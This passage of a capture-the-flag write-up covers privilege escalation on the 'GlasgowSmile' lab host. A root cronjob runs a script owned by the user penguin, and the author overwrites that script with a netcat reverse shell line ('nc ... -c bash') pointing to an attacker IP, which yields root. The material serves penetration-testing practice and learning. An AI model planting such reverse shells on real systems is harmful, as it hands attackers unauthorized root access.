Overwriting Root Cronjob
The identified root cronjob process on the glasgowsmile host is executing a Bash script owned by the current user; penguin. Privilege escalation via overwriting the Bash script is achievable.
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo -e '#!/bin/sh\nnc 192.168.45.182 1234 -c bash' > /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
#!/bin/sh
nc 192.168.45.182 1234 -c bashOverwriting the /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old file with a reverse shell command.
/Play/GlasgowSmile/5-Privilege_Escalation/attachments/{59A34781-718D-45A6-923B-E011BB653078}.png)
System level compromise